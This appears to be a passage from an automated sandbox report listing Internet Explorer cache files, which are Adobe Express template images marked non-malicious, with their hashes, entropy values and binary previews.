                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):15190
                                                                                                                                                                                                                                                        Entropy (8bit):7.900823858341308
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:A3GBFJZuP4Cd0ph1XIjBsG3osiVH2cSxm1B/k:N5uwq6sLxxm1Bc
                                                                                                                                                                                                                                                        MD5:ABE63D471829BCB3AB3658DEF6906867
                                                                                                                                                                                                                                                        SHA1:231AFECD20FB809B6C9774FEA8D0CFA90C4E74B3
                                                                                                                                                                                                                                                        SHA-256:0AFF67DCBCCDAC84D25F477D210AC8150C25192216983C10112D4B25E2A85C6A
                                                                                                                                                                                                                                                        SHA-512:48A58E6D71ABFAE3AAF921C1C39C90C613660A6B4EDE2F601F302254430DD8F4253D6F7323D9065450F36A68BA1CD81DCE8575FB5B3ED3FC1BB73F8AA2B6AA90
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/create/media_127d8ddf746b3d9b821b50287212a23ace9adf57c.jpeg?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFFN;..WEBPVP8 B;.......*....>u:.J$.#!......gn._....-.%..;`..M~....o./..O.o.^@.!.ox?......G.?........O.................O....~......k........?.......{^...6...K...'.?.?.}t.....i.....o.Oi/........a............u....O...7..}~........w.....'....,..............<.;q@.._..........E..i.....W...g....|I~.................U.'.K......%..?..e...C.......?.>....'.?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B.R....n.)%/..?f.B
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_12aa7e4bc0022e4439e60c45ad19f273e0b27517a[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):15516
                                                                                                                                                                                                                                                        Entropy (8bit):7.987491006007941
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:qGrRUbYsOI12dIYrjGW/bRqAOuUnIkxXa7FNpCOnuI:qGlUMrQiCARoICamI
                                                                                                                                                                                                                                                        MD5:CF624FF5D26B2A801821939488DEB07F
                                                                                                                                                                                                                                                        SHA1:75F585F9DCDB8595BE6B0E4AD07975FF616C4701
                                                                                                                                                                                                                                                        SHA-256:16C0C9C0D76D9AFD82C0D72607576D09C32F146006041B59E03C44A77AF5B60A
                                                                                                                                                                                                                                                        SHA-512:B8EE14D92F55AB2DAE78A16930077BA15F729F9F007B52AC19A3BDDE477B1A831E1F25A208AE8B0680A7475F3E08CB4E8703825BC78B8DA1819DFCB758095163
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_12aa7e4bc0022e4439e60c45ad19f273e0b27517a.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.<..WEBPVP8 .<.......*..k.>u2.G$..!*3.h...M......_b}/..}......{.....f....?.{........O.>.....?.~.{....'...O.'._.....Ox..}@?......C...{.W.c.w..............?......7.......>?.n...........R............x.....^....<.u...wq....3...?.~P|8}../H.......W.}.'............k..........>..../.C......_......Y...)..o../...?..._....$-7..">.....Z..#v..Q.V...z.R.O.........9.F..N..^.7Av.;..0.....<....6..}/...P....a.@./.:..}....\;-..E.n~.0q._.t....(....;nQ.....Z.}j.nq.J....j...b..L..1.t....$?....d.q_...,Z..M.\..`........9!.B|..$\.f..>.;....(.`.iB...}..o...Q...i....Rq.oa.{.&..x.....L.C.kg.../....0<>.2..c5...0.l{v.J@....A..~e..*........%Gt.Cg.,G.....v.d..t-....n..J...L.......i#.!../.2..Cz...R.K.s@j.Q.9)U..P.M.@.DJ/.[Y..~..q.._....].O..n....3.TJj......(.K.....}...9i.....A...eUty....&..+..}.n.....4/..0y=.#.....<.S.....^i.ZtI...:.....3q..{!.."Q0B.....E.==...0.@.iM....9..E..&.{L.0;.(...ZM..`%..............@...R.2...i.:.rD.x...a.7.._/.`....g|..Ge.i!..[j..k....zg..<
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_13c3fd217f966dd5d96a90ef8f11a8cf44f63ac97[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):15508
                                                                                                                                                                                                                                                        Entropy (8bit):7.987829198986237
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:szdutUliGU/PpXBOkAcZInE0Gl35LhBEo5jnz5w:szduxGaNllI5GlZEMw
                                                                                                                                                                                                                                                        MD5:945BDFD0A258F85C77410E0702E821ED
                                                                                                                                                                                                                                                        SHA1:B2CF90C3F3733AF03CDA97255A526C932E0CF8EA
                                                                                                                                                                                                                                                        SHA-256:63BD50DB6AAE3FAF4F4C4776E715A60AFA91C6B07598F363D137B0BB80AF4ED1
                                                                                                                                                                                                                                                        SHA-512:A50BB53EF96E0B4A84B2936D8AC01B0D0A47711E15EAB6DD9C66BA7A8F1927A21DA17070F73E79CBE97740A8F844F97454C2B6EBECC9C8F210FBE3D8735E5F1B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_13c3fd217f966dd5d96a90ef8f11a8cf44f63ac97.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.<..WEBPVP8 .<.......*..k.>u2.G...!*..h...in.K.4..X.....h..?(.y=U....s.......g{.....o.'.........W.... .S.....~._..;.'...g.......i...z.z..?....,}(...'.....?....^...+.......?........_.g..................s./.?..5...U....././..._....w................C.X..=.............,.D.w...@.}.z...~...Z..1....(...S..J..^....f&6?:.........M[.7...........l..!.=....&.....x......=p\.\......mV$&...:.2.$.....q...=...fn\..q%i..0a.. tH..........9U.3q.p..dT........^.e/'...`.....T}..[S...N.v...I...P.2..j.......?Y.;R>.f..[.H...5...~.h,[L|.m...]...w0..53.f..c.:..o..~...s...%.......(..j,.L1.X!...{O$..g..s.4...$..G..m.......kZQ<...m....vc".......#6...]!...u!.F%.%-.5G.V.[......d.>..]52..A.WZ.Q..l.i.=g..k...'pk`...D.c..o.>..p.K.].;e....l._i}.Zo..}.....f....L.0.........q...C..[.^.].,m1.?.v.=x..<.Kr2......"...6z..=.a.Ti.ykhJ.Y..P..b.'.....l..H.......DJ.%.i.}.`..b.u... ..4)........@nfm.,e.. ...Z.>..+...`..:\} q.9.".9.q#..+&...osk.G.....H.......7(T.{..k...B!..>S..].t.3..1
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_13e8c433d76c80c51904af0d7c2cafd474aee6188[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):10514
                                                                                                                                                                                                                                                        Entropy (8bit):7.979563481957939
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:8BkbtwfEgs8i3P6oSBnnjEImP0h2W1qd9xJMPQ/NsTiS6L+yN9F+LZpWttZivDEk:8BkqfEg3i3PhSBjELMN169Qv6ayx+LDf
                                                                                                                                                                                                                                                        MD5:BA7B473A4CE49E2E015FD1E5C10F7803
                                                                                                                                                                                                                                                        SHA1:F95A0F7F5EFE9A22801D53B5877DB75C571F2A8F
                                                                                                                                                                                                                                                        SHA-256:C0072B44CA8318852CA29D948951C852AB6D8139D93DBEE7C146297DE73A86C6
                                                                                                                                                                                                                                                        SHA-512:C0900C0881B6709DB732CA702559064F10A33C26822CF4971B9B59B99DEBA83CD357708AB868CDB94F883ED07AFAB999FBC86F23808F4236BFBB622957D743A4
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_13e8c433d76c80c51904af0d7c2cafd474aee6188.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.)..WEBPVP8 .(..0....*,...>u6.H....$RK....cn.< .C.Q.....d.B.?.....K....;............#........c......._.....g..p.....?............g..s.-.._........@?../z;.Wh...~..s........{...6l....._..j.....C...?..............A...S...6......./..>.......O._q.;...[../.........5.....w..........U.K.?.?.?..J.......{.'.o._.?......Y.{...............K....Pt[.%...H......Z.y.c...3....agOM.....#.j..AM...t=.J5g.F..t.iy..t...6t..r.s\............Q...TG.....s5..M...L....y.u..?........Be21a....._.L.U?..K.'.....x.@C...5F.`F<.....?}?.xX...m<.@]..p.x9n/........S.A....wC."....s9l/.Y.A\.....K...F.b.p....S.#.s..xQ.....)\}j....;.?....F..b..Z..v...........9.+i.CJ.9..qNx.D}........<.R.t..M4,r`.K.....&B.#......|n..{.#P+...j(?n..q..0.<..E.1.*..W.f.Q..C.!....Y.L..>.#N...gq~?o<>C.....K...(/Q.......{...U..=.liB. .wT.......{.....2..i.b?..!|......2..!m....._D.f..-7.l.2I.yl...t.f..5...1....G..z..}.`\.,.d1.!.)E[.s.9t:..~T..V.^...fD{..Wl....^A...\.F.~... ....%.sL.A6....rsix..s../...1}E
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_14c1b678d5536b884fc65a1a6cd5a0bbec91f4bc5[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):9776
                                                                                                                                                                                                                                                        Entropy (8bit):7.977422948816017
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:kSRbIlLdvnHxSFEds+sDITvGkCw/nLtSqGIW8kAtx4qhc3uddhZOEDEH+IM0/vIQ:kWI5dvnHwUs5ITvG9wvBrGIW88qu+V7a
                                                                                                                                                                                                                                                        MD5:0D9FE55C7FB68C46DB715EFA4F23E667
                                                                                                                                                                                                                                                        SHA1:53EFAC440E22E1C9A882FEE68156A979CE3914DF
                                                                                                                                                                                                                                                        SHA-256:F733CF1CBC762CF7078A771422DCA4876759843F07C76350A8C0B493E051024B
                                                                                                                                                                                                                                                        SHA-512:A087BAAE6E3483AAC22B3F371BADFB7F1723B8ADEB8A525CF10F2F4FED20E03C2918F80381A29E411AB2E7DE8D9874F50E74FE6545CAE619881D95E50382A46F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_14c1b678d5536b884fc65a1a6cd5a0bbec91f4bc5.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF(&..WEBPVP8 .&.......*,...>u4.I$..!#R.x...in.{..zd.2.:n.;M.>.w.....z..^.+.?....._..q.......~..o.....*.]................y+...............|_;...../...........%...M...............n....}............n...A...O.....?._....k...'._.?........_......m....o....~...+..Jg...."..+k|......C.u.....X.i....x.'...L.~.2..n......9.D..F....f.(.../1....iu.`..>.}*...X.D._b.P...+.g.O.d..l..nwAif.....27.n...%.C..A..........5...A.P.l..;.....,.2'.t..N......K.~.^-...,..rM.C....?uZUV..D.v.c{33.....9cz.l@\..i...b.',...b...V..pbp.w..c.uz.V..[..J`....H{..#a.8.1.\R.........GY4?........;.......#V..>......C.....Ep....O....y..9.@.q.[H... _.u6..G.|O<...F..q.._sk..>.P.58G...@Q.b...g#.S.l....o..}..^...@.EF......P......y%V...M...#...D=........3..?..FKp;.u%..]..:rI..s...F^....Z....W0x.lK.`2...$....qO..Fv,X.J..3gI...,.@+T.^....J.N..n.no..CN.AAt.[.8..w.o(P~..K.a4C....V~u....fM.....J...8...,.e`...y....]...c..9..Z...O.c.t).......`.{.......9..c.w...gzC..f..X..tT..Y.@......5..9p8.1
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_14ceb3c1bd84d311e1994d072dbaa4a328918e7af[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):9758
                                                                                                                                                                                                                                                        Entropy (8bit):7.97945684464304
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:tDAKNuE46A7VGK6lXHBxofWAFnIJizZJXShaE+bPyHYEQA9J5/4ZoaiknOkh:FNu96jHBxqJTE+ba3QA5u/
                                                                                                                                                                                                                                                        MD5:42366628DF37228A58815FEB86B1BF7B
                                                                                                                                                                                                                                                        SHA1:278B7267CFFB072D45905F82E194D994CBBF79CD
                                                                                                                                                                                                                                                        SHA-256:43A5A89D0EC6EDAAA50A04659E0C5C0315618845BCDB0092EEB2819DA6419E64
                                                                                                                                                                                                                                                        SHA-512:8A68F8D7B589C37940719E4A9D4C2A843004E883C187805A9B0A04B2D21999939AF10EF5096A421E92F0BEA76289BFDF6517CE2A3B9D734844E15993112DDC88
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_14ceb3c1bd84d311e1994d072dbaa4a328918e7af.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.&..WEBPVP8 .&..P....*,...>u4.H....$U[a...en....j.q...OgE./.o......x=9..~...z............G/J........]0?.p#;..-.M.i.Ol?.h.....?.~......../.G...?..w..;.?........)........W...g....7..?.}......w.7...}.....?.[.O._....L.....S....o.........g.w.o..m.....m?...~...1.........X.......V.JP&G...h..H.~.Amc.x[....Y..f../...|.7z.)..XW..a....@H?y0p.u.@Co.g..-...*7..49....7.S[.......K...5....../g`US.+.7*PI...k.10.|.y..&..F!.&J.(v.K.Y.....WV!!.`..8.;.KS......C>]B.NF.pv..Gr...........D......n.n.I..b..K..:..J..m8..f..(........m.d.P.O.9G......b.x(,^..=........N.^.....%.....U..._F)\.&..P:=s...<...%...3....../z.y......cb;..8x0.JG..8.M.....&..../.;.o..._...X*..p..}..]....U".C3..|..~...../q.U4..r.......b.-o.P...G.....u.....z.I.9y..65...4....%....L............F]xAY./.W....o=.5$...,..R=..........a..(+.7BL.)..*.}.C.e....,.....K....N.a...'....^V....Z.V.......zp....7,....\.\..A$,..q.?.d.a.Y.d\_.-`.GU..k.j....X..N..;m....R.K.c_.........\......F..}q......V..j......'...f1.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_1522dd4d72982d1fe7951471e59444ac40eab2255[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):11784
                                                                                                                                                                                                                                                        Entropy (8bit):7.9831602641192365
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:Qt+4/zDayc+lmbX0CqiTPZ6759stI2pTQX9TuTeHVt3OVZXFOLh+JPAA8WsBrfnK:sjfa9+yEC1y9D2CNKTeHVt+Vt4uoAqB2
                                                                                                                                                                                                                                                        MD5:16667B7A0A947BA132EE07695FBFE064
                                                                                                                                                                                                                                                        SHA1:2862AE32B7815D0EF1A59B6D5991618E3C62E74A
                                                                                                                                                                                                                                                        SHA-256:1145213435965C31D4B56341EF55D4B24BA935AC7647A3E5A2C3A41B9E75BCBA
                                                                                                                                                                                                                                                        SHA-512:74DCB02EA68CB39DBDB43F6E9121E7D019C5F89693489DC54BFD89AD846C81F5A4F642ADCFBBC5503EAF020AFEC2F54ADE1F6D3551BF65093D8E63ABB775C6EE
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1522dd4d72982d1fe7951471e59444ac40eab2255.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF....WEBPVP8 .-......*..k.>u4.G.."!'4.....en..7........3.....{|.v.......y.~.t........%.........]e..=F.f}:}.?........e...H..~......L.!./...v?...d..O....w.g...................?..vRl_.b}.}....O.....~..............?......W.k....i>....h.....w.......}e.....o._........x........F;D..t.."..Ox..v.Fc.\....c..~>..Q......A...`.f+U.Sc.r.. (..'.(..pR.[qX.,<.3L..dF"..3.:.DGI.~...9..|..L....._-...O+....tJZXs...7.`...~...v2.bp/~........X..0q.....Rd..bI(4.Ej.?G.....J.z4.6.>a.Y.p.]...Lg.Q+E.....lX.W\.q.)...R}..5C..I.]..0...D........22...w.........0d}..]....GF].+.#G.)"s......N#*..Q .I...Q].....u.S`b....&:....S.L.P....{.:/.@$b/>Ib.A_A8...Rj\\..a.P.K.XC..O(....|0...8..u..].....p..d.,A..p....^....E........KC4...S|....Z0J}..\x...n...n.%o.R.=I....TT.JX&.i..O.]:...;(......v.y..f...1............c.f.K?....>..wj.......}.....'.7.Ue|_....._%j.../....j.*.d+=+..Y...X..\..ok.b.>J ..*\s....!..r 0..l..u...X.g&.9.......>..O....n.X+...E./.*...~...t.....#~.2.c{EO.H..6*P.\2
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_15d09650d5e287278cbbb8fa05a3f1ee2317ae3ac[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):8278
                                                                                                                                                                                                                                                        Entropy (8bit):7.975952743847897
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:KNYP85JCm1lqhZb3TSGKeGClef0yk2F8t8Gq0:KWSMm1YzDT8o26tZq0
                                                                                                                                                                                                                                                        MD5:582BE8F6D5D5DE3EF766BEED5CC28FFF
                                                                                                                                                                                                                                                        SHA1:1E6800C4125CFCD52D9C350E98C84E6B6F645E1F
                                                                                                                                                                                                                                                        SHA-256:63916E4738A118C17A2988C136456C2C27E4F9C785D7F2E408A3B9BD83564504
                                                                                                                                                                                                                                                        SHA-512:18513F2015CE7D3867878096A32107D60D54AA8276A334FA793D7DA3D1D4B7045F74D9F7A56AB9AF7C4CE276A18400A953868DE55C65D21DD0A8C7948C4465DD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_15d09650d5e287278cbbb8fa05a3f1ee2317ae3ac.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFFN ..WEBPVP8 B .......*,...>u:.H....#......gn...R.#....boy4..............a.-......j.w..........5&.O..~......_..A}....c.{&u.......c...?...~[......./...N...S./....|..0...O...?.?.?............?M.....u........(..`:..<..5w..iu..._.~WU..+...Z...d......vE...............N.|..K.4U.$...[C..(....Y....d...4.}.!.M....u(.7.....t...;..!........S..Q...|.0.K0uQ.s..Hw..".........I..m.....C.f......&.+K..^..I..y...R..wS....9.^...:..]......%..E.E.S...^sU....c).._.I:..q...r...J.....)Z.<......,&....n...=..(0....V.}..TO........O....b`...M...)..7.E....0........V^.3M.....<R....).o..g.S.{..(r.....0./z.;.)./>....=.:.[(..{|.0.!!..R..Y...[..'......t.*.rQ...4.n.n,.....b.uy.7.......H..G.Z...^f#N..'|[.E.8.o/...Tj....S.|f.dn...j....D....X...<{.|.L.b.|..G...1*.,.]....;......A."...Id...........#.......<Lc../C..U..E..$t`... ..xvV./(,....X.\Ma.<..&A.O.`.R.....(.....53B..P..;....S...Q.>`..5....=.Q.Ez..)'.:....m.<.I.....c.Z.....(..B.|.......*.4i.V....l)...$N...8..l..s
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_164ba32a452ede9f21053d1bd33db8e5bbedc309a[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):14466
                                                                                                                                                                                                                                                        Entropy (8bit):7.985429894432838
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:TdczVMzmDOkWZu4LMiwArquPI+/89TunN+TwSfh:azFDnOUifquPIJMN+rfh
                                                                                                                                                                                                                                                        MD5:43B5B2F33810AE9A370110B1571DD251
                                                                                                                                                                                                                                                        SHA1:B6686C58FBFABAF0ED75D373A064C2096518AB3C
                                                                                                                                                                                                                                                        SHA-256:0132AA208F0F6E35A71E963444EC930EE3BF5A44039B9406EFA28464B2C68581
                                                                                                                                                                                                                                                        SHA-512:7C97038DE41DD7390EC6424E7C762C1D1F4433D5619EE51397385F8D52263292AF251C64A6DC3A01DD2ACB719BA3450455ECEF449F0AE3352210D00CFCC15E5E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_164ba32a452ede9f21053d1bd33db8e5bbedc309a.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFFz8..WEBPVP8 n8..P....*..k.>u2.G...!&..`...en...3..j+..................=g..>.....#~......G...g..O..O....4..U.....O~..............?..,N..'.W....{...O..........k.o....M;......^..C....._.?....G.O.....?.....{...........k~....[...#.....W.................M....~.~........_......[....x...n...~..h.u4L1+E.9\..a..n"...V1c.|}..J#.....9t.X..c.. ...GHKf..z.._c.......f...-.`Kkd..............kH. S+..}.....d...V.p......T*..)M..@U..(...x.Z..R....d-..@8..%........v..@h...V@pP.W..pX..[..X.h..-~.8......8zM...+'N.E.._....L/..........>..k..;....|p.f.3.Ht....K(\.g.'?.......`......8..a..*R*...u`H<...$|..h..d..e.Ae~..z.P.r..x.i.0........Y5v..IO)..{.;_....El.I...k..".n:|U@.A..1......~B.y3D.E........WZ.6......!.....u.w...A._.+!M.Z{.J=.idz....j..._.#$....F^..G....g.P.6._.-TVM..zz....qjS..9.:.."U.f..Bo.G.p(.......=.x.n..e.+;z.^xU.....q.-.u........l&.. #E`....J..&.E\.N.4.x,kK..o...z2\.............gE....))......{..-o....*.IV..y.@..Uw../w...XaS........Z..sh.zN....."<...*]m...
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_1685c579c98b14832047288ff8107734f541b8104[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):11430
                                                                                                                                                                                                                                                        Entropy (8bit):7.981535275275684
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:MKOhl+byEz39HXYqhpUIYKlzqiVQ9HxAEhq/JyYll6q22q4FkhUvl8JAP8CxoRQ:xOhl+eQ35IwdxcH2EhqEA8q22q8kheCw
                                                                                                                                                                                                                                                        MD5:AB0EC9A64E45876B64933579FFE46579
                                                                                                                                                                                                                                                        SHA1:88E624706E165298D9FCDC6F378B6CC3373015FF
                                                                                                                                                                                                                                                        SHA-256:FAECA50FF4D1D65168ECF0EF53DBAC7A3348F0EF1063B0C62125DB913C39AA41
                                                                                                                                                                                                                                                        SHA-512:CB51E4B902F196094F160C54BDBCC4DBE1F430E1DEF2A874C8A44CC898ADEA8320495F029871A9F3F1BABFE0D0147FDBB164D7B7E000E9A31633E0AB2BF79223
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1685c579c98b14832047288ff8107734f541b8104.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.,..WEBPVP8 .,.......*..k.>u6.H$."!&.....gn...._.3.F.l..._B...?[}7.?.{..@=rt...<./.^.5...7j?..+....r.3~...}~.............../......u...}.9../.?.}.}h._...~..+._..._........y..../......S......._........'.^....._...~.......9...).f(...h..l..F'=...[.V.>.<..A.7....B.KB......Q.oY.T.o..Wz.oC.+...w...N.U.. ..R.=..[[...b..?z.1....5`ZT.Q;(..>i/5l.d.~..y.K8..@..[.k\).l.......$........i..=.0......\_.... P.X.c....N..9/.{%.hu..d...p..P ..5>.l....K.6>.....{....<.:6|..=3...%...<no....8...Z.GY.U.(a;m....C~Zi.....+..aaSH.$..U.;2.;]....N*.?S.B.v-..$.a.......,.Z,@..u.....Le.....m..A.L....2..J.L...^....!iM.pN>.Pf.M&Nr...KZ.B.@.'R..u./.:.$..R..T...J..Q.>...}....V.&...,..k.F...\.W.......DO.U~...+.)C..38b..,.K...a.(..r..SU.lY...c...r..8g.&K...........l....e...u..pv5.&V...o.....t.x.{..4d.. ._T.3g.GP..N.<=....C...hF...L..n?....D.{.o.....e...G.>..u...517...[..(...N..Qs.NY.,.......\.X.........3D.-.2c....U...**.....P.)%.(0...<....s~z..q.....IS...;[..v+%.-#..D%....C.J...
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_16982f492fe1f0482efad2042470c7917729b8ee6[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):11058
                                                                                                                                                                                                                                                        Entropy (8bit):7.982239895365068
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:FPfXtADU4TU/qMli/MbRhRy3AqTsWb3VmRezPCNzGKuv/zjIR5dymRvA2dEHkmxy:FnXtADUCO7Wshsw0s6Vmgz8zgn4R5d33
                                                                                                                                                                                                                                                        MD5:F5754468679822EA98F123DC5CAD1F8F
                                                                                                                                                                                                                                                        SHA1:5F1F7A7A00C286065307D8A981E75B61390816B8
                                                                                                                                                                                                                                                        SHA-256:E0313155A082A1EB297FAB3DFE773E96E920C9D5FEF7C9A05661E1ACC13FB2E2
                                                                                                                                                                                                                                                        SHA-512:712944F92F7AADF1C99F5291083D66DEEECB1FE7CFFDBA9B1C6C51731DA884BBF0009F55E5A012D2D9096B655BB731B5F1588D3A2327D694353FC16DEC2C5F07
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_16982f492fe1f0482efad2042470c7917729b8ee6.png?width=2000&format=webply&optimize=medium
